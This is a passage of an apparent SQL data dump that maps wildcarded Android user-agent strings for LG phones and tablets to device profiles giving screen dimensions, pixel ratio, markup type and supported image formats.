Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-H815) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-H820) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-H830) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-H831) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-H840) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-H845) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-H850) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-H860) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-H870) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-H870DS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-H870S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-H871) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-H872) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-H873) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-H901) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-H910) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-H910PR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-H918) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-H930) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-H931) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-H960) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-H961S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-H962) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-H970) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-H990) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-K371) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-K425) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-K428) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-K520) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-K530) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-K535) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-K550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-LK460) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lg','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-LS777) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-LS993) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-LS997) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-M150) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-M200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-M210) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-M250) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-M255) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-M257) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-M320) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-M320G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-M322) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-M327) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-M400) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-M430) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-M470) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-M470F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-M700) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-M703) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-M710) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-SP200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-SP320) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-TP260) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-TP450) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-US601) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-US701) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-US996) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-US998) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LG-V521) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lg','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LGAS992) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LGL157BL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LGL158VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LGL163BL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LGL164VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LGL59BL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LGL63BL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LGL64VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LGL83BL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LGL84VL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LGLS775) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LGLS992) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LGM-X320L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LGMP260) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LGMP450) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LGMS210) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LGMS428) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LGMS550) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LGT31) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lg','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LGT32) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lg','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LGUS215) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LGUS992) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LGUS997) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_lg','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; LGV33) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 